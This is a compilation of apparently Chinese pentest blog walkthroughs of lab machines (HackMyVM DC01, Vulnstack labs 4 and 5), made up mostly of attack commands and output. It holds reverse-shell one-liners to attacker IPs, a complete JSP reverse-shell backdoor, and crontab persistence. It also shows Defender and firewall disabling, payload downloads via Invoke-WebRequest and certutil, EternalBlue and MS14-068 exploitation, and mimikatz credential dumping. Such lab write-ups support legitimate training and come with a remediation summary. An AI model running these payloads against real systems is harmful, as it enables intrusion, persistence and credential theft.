HackMyVm-DC01 ：简单 10.1 信息打点nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'漏洞扫描nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln使用新版enum4linux枚举系统的全部信息enum4linux-ng -A 192.168.53.26 -C10.2 SMB无密登录列出来smb共享文件夹可以匿名登录的共享目录中都没有文件，只能继续信息收集从上面enum4linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域后续 LDAP 查询（如 ldapsearch）要写 -b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）后续登录域账号时可用短域名（如 SOUPEDECODE\admin）或完整域名（如 admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。其中- SOUPEDECODE <1c> - B Domain Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL10.3 ldapsearch那么利用ldapsearch的完整命令就如下ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"上面的代码是什么意思呢？其核心”匿名访问被拒绝“各个参数解释如下连接 192.168.53.26 这台 LDAP 服务器（域控制器）；用 匿名方式 访问（-D '' -w '' 表示空用户名、空密码）；查询 dc=SOUPEDECODE,dc=LOCAL 这个节点（域的核心数据节点，存储用户、组等信息）；只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。为什么报错了？text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”我们想访问的 dc=SOUPEDECODE,dc=LOCAL 节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。如果不加这个-b参数呢，把它去掉，这样就成功了ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"这段 ldapsearch 结果包含了 域控制器（192.168.53.26）的核心架构信息我们之前执行的命令指定 -b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；而之前指定的 dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：域的命名结构（域名、目录节点路径）；域功能级别（操作系统版本版本）；支持的协议和认证机制；域控制器的身份标识标识（主机名、角色）；LDAP 服务的配置限制（如最大连接数、查询超时）。10.4 匿名枚举用户的SID解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsidfind / -name lookupsid* 2>/dev/nulllookupsid.py 是 Impacket 工具集中的 SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的 安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass为什么能列举出来SID？lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的 LsaLookupSids2 接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt10.5 nxc内网渗透nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击所以命令如下nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西换一个USERS，这里面有东西，我们去看看，全部下载下来尝试上传一个文件shell，禁止上传将全部的文件都下载下来recurse ON prompt OFF mget *在ybob317中找到了flag10.6 kerberos攻击服务器上开启了kerberos服务如果目标是 域控制器（DC）（如你之前枚举的 DC01.SOUPEDECODE.LOCAL），则 一定开启了 Kerberos 服务，因为：1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe 进程），否则域功能无法正常工作。impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317通过域用户 ybob317 的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用 hashcat 等工具爆破 TGS 票据哈希）。同步时间ntpdate 192.168.53.26将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt使用smbclient登录smbclient //192.168.53.26/backup -U file_svc Password123!! get backup_extract.txt exit随后使用awk进行筛选awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txtnxc smb 192.168.53.26 -u target_users.txt -H ntml.txt最终账号密码如下FileServer$ ：e41da7e79a4c76dbd9cf79d1cb32555910.7 远程连接evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限10.8 获取system权限后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1" Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck Set-MpPreference -DisableRealtimeMonitoring $true # 关闭杀软 Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe" ./shell.exe # msf生成的马可以看到是能正常上线的扫描出来两个提权漏洞，第二个不能用可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + baibaixiaoyu2024exploit/windows/local/ms16_032_secondary_logon_handle_privesc往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学 十年磨一剑！本次靶机呢，也不算存手工注入，就是介绍了不用msf的打法，文章很长，但是呢能学到的东西很多很多！比如隧道搭建是proxychains+frp,然后docker逃逸，域控，横向移动，权限提升，写公匙获取交互式shell，永恒之蓝利用等等，网上很多教程都不是最新的，复现起来有点困难，对于windows渗透不太了解的师傅们可以学习学习，感谢阅读前言最近vulnstack官网进不去了，还好之前保存在自己度盘的，需要自取，一共8个，红日1-8全都在，一共500G左右，下载还请预留好一定的空间通过网盘分享的文件：红日靶场 链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: uze8 这是红日官网，进不去了都环境配置打开虚拟机后web设置网卡1为nat模式，网卡2为仅主机模式，密码为ubuntusudo docker start ec 17 09 bb da 3d ab ad sudo docker ps第二台系统是windows的，网卡是仅主机模式第三台DC域控仅主机模式网络配置好后，得以登录看看靶机的网络环境ubuntu:ubuntu 10.10.10.131 192.168.183.129 域成员机器win douser:Dotest123 192.168.183.128 DC administrator:Test2008 192.168.183.130网络拓步结构环境配置好后就可以开始渗透了外网打点利用arp-scan进行主机探测对扫描出来的ip进行端口扫描，发现靶机开启了2001、2002、2003端口并且这三个端口都是http服务，也就是说我们能通过网页直接访问到2001端口如下，Struts2服务（可以看网页标题）2002端口如下，这是一个Apache Tomcat服务2003端口，phpmyadmin，一个数据库管理工具Struts2渗透那么一个一个来看吧，利用Struts2漏洞扫描工具执行命令测试利用bash进行反弹shell，并且shell是root的，但是这是docker环境/bin/bash -i >& /dev/tcp/10.10.10.130/1234 0>&1在docker的渗透过程中呢，如果得到了某一个docker环境远远是不够的，通常需要得到多个docker环境的权限，来判断当前docker环境是否能够进行docker逃逸，这样才能提高渗透成功的概率，接下来是TomcatTomcat渗透Nikto，它是一个开源的网络安全扫描工具，简称漏扫工具nikto -url http://10.10.10.131:2002/发现能够使用PUT方法进行上传文件，可以手动，但是不建议，我们直接用poc打python 42966.py根据使用方法，得到如下命令，成功获取webshellpython 42966.py -u http://10.10.10.131:2002/ -p pwnphpmyadmin渗透切换到主页，这里能看到phpmyadmin的版本号为4.8.1发现此版本的phpmyadmin存在文件包含和远程命令执行漏洞我们利用第一个exp┌──(root㉿kali)-[/data/exp/demo] └─# cat 44924.txt | grep http http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm成功利用文件包含的pochttp://10.10.10.131:2003/index.php?target=db_sql.php%253f/../../../../../../etc/passwd文件包含phpmyadmin日志文件首先是日志包含，在日志包含之前我们需要先查看mysql的命令执行日志的路径SHOW VARIABLES LIKE 'general_log_file'; /var/lib/mysql/ad7866b3df9b.log写入日志select "<?php @eval($_GET['123']);?>";包含日志文件，报错了，这个包含方法不行，那么就换一个文件包含http://10.10.10.131:2003/index.php?target=db_sql.php%253f/../../../../../../var/lib/mysql/ad7866b3df9b.log?123=lssession文件创建shell我们创建一个数据表写入一句话 <?php @eval($_GET['123']);?>查看session，为3cfb6084f034677df82ef00120cce4fd包含sessionhttp://10.10.10.131:2003/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_3cfb6084f034677df82ef00120cce4fd执行命令，失败http://10.10.10.131:2003/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_3cfb6084f034677df82ef00120cce4fd?123=lsshell获取失败docker逃逸docker信息收集，判断当前环境是否是docker环境，可以看到这个是属于docker环境的ls -alh /.dockerenv cat /proc/1/cgroup特权逃逸如果管理员启动某一个容器的时候呢，利用了docker run -privileged时，docker容器将被允许访问主机上的所有设备，并且可以执行mount命令进行挂载mkdir /tmp/forest mount /dev/sda1 /tmp/forest这里struts2服务逃逸失败了，之前我们不是得到了Tomcat的shell嘛，我们利用这个试试（这俩个是不同的docker环境），这里就能挂载成功了mkdir /tmp/forest mount /dev/sda1 /tmp/forest ls /tmp/forest成功挂载了，那么我们就要获取稳定shell，这个shell不稳定，经过测试python等一系列反弹都不行，那么就切换思路，利用kali自带的反弹shell的jsp脚本// backdoor.jsp // http://www.security.org.sg/code/jspreverse.html <%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" %> <%! static class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader isr = null; BufferedWriter osw = null; try { isr = new BufferedReader(new InputStreamReader(is)); osw = new BufferedWriter(new OutputStreamWriter(os)); char buffer[] = new char[8192]; int lenRead; while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) { osw.write(buffer, 0, lenRead); osw.flush(); } } catch (Exception ioe) {} try { if(isr != null) isr.close(); if(osw != null) osw.close(); } catch (Exception ioe) {} } } %> <h1>JSP Backdoor Reverse Shell</h1> <form method="post"> IP Address <input type="text" name="ipaddress" size=30> Port <input type="text" name="port" size=10> <input type="submit" name="Connect" value="Connect"> </form> <p> <hr> <% String ipAddress = request.getParameter("ipaddress"); String ipPort = request.getParameter("port"); if(ipAddress != null && ipPort != null) { Socket sock = null; try { sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); Runtime rt = Runtime.getRuntime(); Process proc = rt.exec("/bin/bash"); StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); outputConnector.start(); inputConnector.start(); } catch(Exception e) {} } %> <!-- http://michaeldaw.org 2006 -->在主页随便点一点找到网页上的这个文件find / -name security-howto.html然后将这个webshell下载下来，复制到这个目录下面wget 10.10.10.130:5000/jsp-reverse.jsp cp jsp-reverse.jsp /usr/local/tomcat/webapps/docs/输入ip和端口就可以反弹啦但是呐，创建不了交互式终端呢，有点难受奥，即使创建了，也是docker环境呢python2 -c 'import pty;pty.spawn("/bin/bash")'那么就使用上传公匙的方法免密登录ssh-keygen -t rsa -b 4096 # 回车 # 回车 # 回车靶机依次执行如下命令wget 10.10.10.130:5000/rain.pub chmod 700 /tmp/forest/home/ubuntu/.ssh/ cp rain.pub /tmp/forest/home/ubuntu/.ssh/authorized_keys chmod 600 /tmp/forest/home/ubuntu/.ssh/authorized_keyskali尝试连接（失败）经过测试很多遍了，靶机的/etc/ssh/sshd_config文件也修改了，还是不行ssh ubuntu@10.10.10.131开始排错，这个公匙权限是root，但是呢我们连接的时候使用的是ubuntu用户，而这个.ssh目录也是ubuntu用户的目录，所以连接的时候权限对不上，也会导致使用私匙连接失败但由于我们获取的是docker环境的shell，是没有ubuntu用户的，我们需要添加一个ubuntu用户useradd ubuntu chown ubuntu:ubuntu authorized_keys ls -al total 16 drwx------ 2 ubuntu ubuntu 4096 Feb 15 08:31 . drwxr-xr-x 17 ubuntu ubuntu 4096 Feb 15 08:26 .. -rw------- 1 ubuntu ubuntu 735 Feb 15 08:31 authorized_keys -rw-r----- 1 root root 91 Feb 15 08:05 rain.pub还是需要我们输入密码，权限给了，用户也添加了，卧槽我能怎么办。。。。。。那么大概率就是算法问题了，强制添加选项（卧槽，搞我半天，心态崩了）ssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsassh连接问题排错方案给三个参考，目前我打靶所遇到的，可以写在自己的笔记里面ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.130 # Unable to negotiate with 10.10.10.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i id_rsa ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsa ubuntu@10.10.10.131内网信息收集我们还没有得到ubuntu的密码，获取不了最高root权限（sudo）不支持本地提权，像常规的suid提权都不行查看计划任务，没有ubuntu这个用户可以写的文件但是还有一种方式哈，我们刚刚获取的逃逸成功的shell，它是不是root？我们用这个root追加一个计划任务，那么真实的靶机就会定时执行这个命令是吧，前面我们密匙都登录成功了，这个问题还不简单嘛echo "/bin/bash -i >& bash -i >& /dev/tcp/10.10.10.130/1234 0>&1">> /tmp/forest/tmp/shell.sh chmod +x /tmp/forest/tmp/shell.sh cat /tmp/forest/tmp/shell.sh # 写入crontab计划任务，表示每隔1分钟以root权限执行一次计划 echo '*/1 * * * * root bash /tmp/shell.sh' > /tmp/forest/etc/crontab cat /tmp/forest/etc/crontab nc -lvnp 1234等待1分钟即可反弹成功创建交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'查看网卡内网主机发现root@ubuntu:/tmp# for i in {1..254}; do (ping -c 1 192.168.183.${i} | grep "bytes from" | grep -v "Unreachable" &); done; 64 bytes from 192.168.183.128: icmp_seq=1 ttl=128 time=0.682 ms 64 bytes from 192.168.183.129: icmp_seq=1 ttl=64 time=0.031 ms 64 bytes from 192.168.183.130: icmp_seq=1 ttl=128 time=0.829 ms发现了另外两台靶机，写入端口扫描工具，把扫描出来的另外两个靶机放入这个hosts变量里面#!/bin/bash hosts=( "192.168.183.128" "192.168.183.130" ) END=65535 for host in "${hosts[@]}" do echo "===============================" echo "Scanning $host" echo "===============================" for ((port=1;port<=END;port++)) do echo "" > /dev/tcp/$host/$port && echo "Port $port is open" done 2>/dev/null done扫描结果，第二个机器扫不出来结果，大概率是禁ping或者开了防火墙frp隧道搭建服务端开启frp服务器web靶机连接服务端编辑修改/etc/proxychains4.conf的最后一行数据使用nmap对刚刚扫描出来的一个端口进行测试，135端口开启，代理成功！！proxychains nmap -sT -sV 192.168.183.128 -Pn -T4 -p 135增加端口数量proxychains nmap -sT -sV 192.168.183.128 -Pn -T4 -p 135,139,445,5357,49152,49153,49154,49155,49156,49157从上面的服务来看，大概率是一个windows服务器，还开着一个http端口，访问一下看看，报了503服务器内部错误对445端口增加漏洞扫描的nmap脚本proxychains nmap -sT -sV 192.168.183.128 -Pn -T4 -p 445 --script=vulnms17-010很熟悉吧，是永痕之蓝如果说我们需要从对方的内网反弹shell反弹到我们的kali上，那么就需要配置端口转发，服务器靶机执行如下命令，我们前面已经获取到了最高权限iptables -t nat -A PREROUTING -p tcp --dport 2222 -j DNAT --to-destination 10.10.10.130:4444这里我就不用端口转发了，没有用成功，感兴趣的可以试试（192.168.183.149是我的win7地址，中途恢复了快照几次），另外下面这个生成了两个payload，因为目前我们还不知道目标是x86还是x64的操作系统，所以生成了两个，然后合并成一个，这样就可以双利用了（注意要多打几次，否则可能利用不成功或者造成蓝屏）git clone https://github.com/worawit/MS17-010.git nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin msfvenom -p windows/x64/shell_reverse_tcp LPORT=2222 LHOST=192.168.183.129 --platform windows -a x64 --format raw -o sc_x64_payload.bin msfvenom -p windows/shell_reverse_tcp LPORT=2222 LHOST=192.168.183.129 --platform windows -a x86 --format raw -o sc_x86_payload.bin cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin proxychains python ../eternalblue_exploit7.py 192.168.183.149 sc_all.bin反弹成功chcp 65001解决乱码问题域渗透查看所有网络信息，这里我没有画，稍微注意一下dns的地址，是192.168.183.130ipconfig /all查看域内用户，和本机用户，本机用户已经是最高system权限了，但是呢不在域用户列表中通过ping就可以获取目标IP信息啦，并且呢我们可以发现，这个地址是和dns地址一样的查看administrators组的成员如果没有密码，那就是目标靶机没有登录，需要登录一下，这样这些凭证才能保存到本地mimikatz.exe sekurlsa::logonpasswords记录一下sid为：S-1-5-21-979886063-1111900045-1414766810-1107利用ms14-068进行域内提权，伪造黄金票据，获取域控的操作权限ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123利用mimikatz.exe导入上面生成的票据mimikatz # kerberos::purge //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc TGT_douser@DEMO.COM.ccache //将票据注入到内存中连接并查看域控，连接成功！通过net use挂载域控共享目录net use WIN-ENS2VR5TR3N dir \WIN-ENS2VR5TR3Nc$web肉鸡（ubuntu）因为只有它出网：wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip unzip netcat-win32-1.12.zip python3 -m http.server将这个文件传上win7，由于cmd没有curl和wget等命令，但是测试了certutil可以使用，那么就用这个从web服务器下载下来，win7：certutil -urlcache -split -f http://192.168.183.129:8000/nc.exe c:nc.exe再将这个nc.exe复制到域控主机上copy C:nc.exe \WIN-ENS2VR5TR3Nc$nc.exe接着新建任务来关闭域控的防火墙sc \WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \WIN-ENS2VR5TR3N start unablefirewallwin7创建nc反弹任务sc \WIN-ENS2VR5TR3N create ncshell binpath= "c:nc.exe 192.168.183.129 1234 -e cmd" sc \WIN-ENS2VR5TR3N start ncshellweb服务器别忘记开nc监听nc -lnvp 1234拿到域控主机，获取主机密码，将win7的mimikatz复制到域控主机上copy mimikatz.exe \WIN-ENS2VR5TR3Nc$mimikatz.exe dir \WIN-ENS2VR5TR3Nc$在反弹成功的shell中执行刚刚复制下来的mimikatzmimikatz.exe sekurlsa::logonpasswords成功拿下域控的密码！！开启远程连接放行TCP端口3389，前面已经关闭了防火墙，这一步可以跳过etsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389修改注册表，设置允许远程登录，需要重启一下，会发现获取不到挂载的域控目录信息了，重新根据上面的步骤再来一遍就行了reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f shutdown /r /t 0打开proxifier开启全局代理，设置socks5连接kali的proxychains端口此时就可以用windows的远程连接了远程连接成功！成功拿下域控主机远程访问权限！至此，渗透结束，当然还可以继续渗透，清理操作日志，也就几条命令的事儿。感兴趣的朋友们可以自行尝试另外也有第二种方法来，域控主机也是存在永恒之蓝漏洞的，然后利用域控主机横向到win7主机proxychains nmap -sT 192.168.183.130 -p 445 --script=vuln报告总结一、测试目标概述靶场环境：由三台主机组成的域渗透环境（Ubuntu Web服务器、Windows域成员机、Windows域控服务器）网络拓扑： 外网段：10.10.10.0/24 内网段：192.168.183.0/24 核心目标：从外网突破至内网，获取域控（DC）权限。 二、渗透测试流程阶段一：外网打点 主机发现 使用arp-scan探测内网存活主机，定位Web服务器（10.10.10.131）。 端口扫描发现开放服务： 2001端口：Apache Struts2服务 2002端口：Tomcat管理界面 2003端口：phpMyAdmin 漏洞利用 Struts2 S2-045漏洞 使用公开EXP执行命令，获取Docker容器内Root权限，确认容器逃逸需求。# 反弹Shell命令 /bin/bash -i >& /dev/tcp/攻击机IP/端口 0>&1 Tomcat PUT方法任意文件上传 利用CVE-2017-12615上传JSP Webshell，获取Tomcat权限。 phpMyAdmin 4.8.1文件包含漏洞 包含日志文件/Session文件尝试GetShell，因环境限制未成功。 阶段二：内网横向移动 权限维持与逃逸 Docker逃逸（特权模式） 挂载宿主机磁盘至容器路径，通过写入SSH公钥或计划任务反弹Shell，获取宿主机Ubuntu权限。mount /dev/sda1 /mnt/host # 挂载宿主机磁盘 echo "恶意任务" >> /mnt/host/etc/crontab # 宿主机定时任务 内网探测 存活主机：192.168.183.128（Win7）、192.168.183.130（DC） 使用proxychains+frp搭建Socks代理，实现内网流量转发。 域成员机渗透（192.168.183.128） MS17-010永恒之蓝漏洞利用 生成混合Payload，通过Metasploit框架获取System权限Shell。 信息收集 域名称：DEMO.com 域用户：douser/Dotest123 域管理员组：Administrator（未直接暴露） 域控提权（192.168.183.130） MS14-068漏洞伪造黄金票据ms14-068.exe -u douser@DEMO.com -s SID -d DC_IP -p 密码 mimikatz.exe kerberos::ptc 票据文件 # 注入内存 横向控制 通过net use挂载域控共享目录，上传NC反弹Shell。 关闭防火墙，创建远程服务执行Payload，获取域控System权限。 三、关键风险点 外网服务漏洞 Struts2、Tomcat、phpMyAdmin等未及时修复公开漏洞。 内网隔离缺失 Docker容器与宿主机未做网络隔离，特权模式启用导致逃逸。 域内安全策略缺陷 未禁用弱协议（SMBv1），MS17-010补丁未安装。 域用户权限过高，允许普通域用户提权至域管理员。 四、修复建议 外网服务加固 升级Struts2、Tomcat至安全版本，禁用PUT方法。 phpMyAdmin限制访问IP，启用双因素认证。 内网隔离与监控 Docker容器使用非特权模式，启用AppArmor/SELinux。 部署IDS/IPS检测异常SMB流量（如永恒之蓝攻击特征）。 域安全策略优化 安装MS17-010补丁，关闭SMBv1协议。 实施最小权限原则，定期审计域用户权限。 启用LAPS（本地管理员密码解决方案），防止密码复用。 五、附录 渗透工具清单 漏洞扫描：Nmap、Nikto 漏洞利用：MSF、MS14-068 EXP、永恒之蓝利用脚本 横向移动：Proxychains、FRP、Mimikatz 攻击路径示意图 报告编制方：泷羽Sec安全团队 日期：2025年2月16日往期推荐ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【渗透测试】ATT&CK靶场一，phpmyadmin，域渗透，内网横向移动攻略【oscp】vulnerable_docker，三种代理方法打入内网【oscp】FALL，wfuzz参数模糊测试【oscp】超长攻击链，TommyBoy1dot0——过年快乐！【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路 红日5简介"红日5"是一个高度仿真的内网渗透实战靶场，模拟了企业级内外网混合环境。靶场包含外网Web服务器（Windows 7）、内网域控服务器（Windows Server 2008）双重网络隔离场景，涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场，学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、Pass-the-Hash等APT攻击手法，并深入理解企业内网安全防护的薄弱环节。最近红日官网已恢复正常访问，如果懒得一个一个转存可以直接拿我的，一共500G左右，下载还请预留好一定的空间通过网盘分享的文件：红日靶场链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: 7ixc环境配置设置好仅主机的vm2，138网段，然后我的nat模式网卡是135网段模拟公网这个靶机呢一共有两个，外网主机win7，设置好仅主机模式和nat模式两个网卡内网域控服务器win7sunheart 密码：123.comsunAdministrator 密码：dc123.com2008（登录成功后要修改密码）sunadmin 密码：2020.com最重要的，需要在win7主机phpstudy开启web服务网络拓扑结构外网信息打点利用arp-scan进行主机探测arp-scan -l利用nmap对目标主机进行端口扫描nmap -sS 192.168.135.150 -p- -A目标机器开启了80、135和3306数据库远程，mysql远程测试，拒绝连接┌──(root㉿kali)-[~] └─# mysql -uroot -h192.168.135.150 -p Enter password: ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.135.128' is not allowed to connect to this MySQL server查看web站点，可以看到这是一个thinkphp框架随便访问一个不存在的页面，发现指纹信息，5.0.22版本寻找expsearchsploit 5.0 thinkphp已知我们的版本为5.0.22searchsploit -m 46150 cat 46150.txt | grep 5.0.22拼凑EXP，执行命令whoami，成功利用http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami查看当前目录http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=chdir使用generate生成混淆的webshell，不容易被查杀weevely generate cmd shell.php从kali下载webshellhttp://192.168.135.150/ ?s=index/thinkapp/invokefunction &function=call_user_func_array &vars[0]=system &vars[1][]=certutil -urlcache -split 